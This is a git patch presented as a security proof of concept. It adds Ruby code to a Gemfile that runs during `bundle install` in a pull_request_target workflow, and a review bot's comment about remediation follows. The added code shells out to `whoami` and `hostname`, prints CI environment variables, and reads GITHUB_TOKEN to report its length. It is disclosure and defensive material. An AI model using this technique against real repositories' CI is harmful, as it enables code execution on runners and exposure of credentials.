From 6af3560de37f1b5571d09d488bae5b95a3854aae Mon Sep 17 00:00:00 2001
From: Ori Hamama
Date: Sun, 26 Apr 2026 20:56:01 +0300
Subject: [PATCH] Security PoC: demonstrate pull_request_target code execution via Gemfile
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

This demonstrates that the lint.yml workflow using pull_request_target checks out attacker-controlled code and runs bundle install, which evaluates the Gemfile as Ruby code — enabling arbitrary code execution. Informational only — no destructive actions.
---
 Gemfile | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/Gemfile b/Gemfile
index 3bb0165fab2..aec0a89de2b 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,3 +1,19 @@
+# Security PoC — demonstrates code execution via pull_request_target + bundle install
+# This Gemfile code executes during `bundle install` (Ruby evaluates Gemfile as code)
+# No destructive actions — informational only
+puts "=" * 60
+puts "SECURITY POC — CODE EXECUTION VIA GEMFILE"
+puts "=" * 60
+puts "whoami: #{`whoami`.strip}"
+puts "hostname: #{`hostname`.strip}"
+puts "pwd: #{Dir.pwd}"
+puts "GITHUB_REPOSITORY: #{ENV['GITHUB_REPOSITORY']}"
+puts "GITHUB_WORKFLOW: #{ENV['GITHUB_WORKFLOW']}"
+puts "GITHUB_ACTOR: #{ENV['GITHUB_ACTOR']}"
+puts "GITHUB_EVENT_NAME: #{ENV['GITHUB_EVENT_NAME']}"
+puts "GITHUB_TOKEN set: #{ENV['GITHUB_TOKEN'] ? 'YES (length=' + ENV['GITHUB_TOKEN'].length.to_s + ')' : 'NO'}"
+puts "=" * 60
+
 source "https://rubygems.org"
 gem "faraday", "2.14.1"
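Review bot: The `GITHUB_TOKEN set:` line reads the secret's value to report its length; a presence check such as `puts "GITHUB_TOKEN set: #{ENV.key?('GITHUB_TOKEN') ? 'YES' : 'NO'}"` demonstrates the same point without touching the credential, and the `whoami`/`hostname` backtick shell-outs could likewise be dropped, since `Dir.pwd` and the `GITHUB_*` variables already prove the Gemfile is evaluated on the workflow runner. The actual remediation is outside this diff: a `pull_request_target` job in lint.yml must not check out the PR head and run `bundle install` (Bundler evaluates the Gemfile as Ruby), so it should either run under `pull_request` with no secrets or check out only the base ref. These 16 added lines are a demonstration and should be reverted rather than merged, because they would execute on every `bundle install` in the repository. The hunk header counts three context lines but only two are visible here, so the hunk's tail may extend past this chunk.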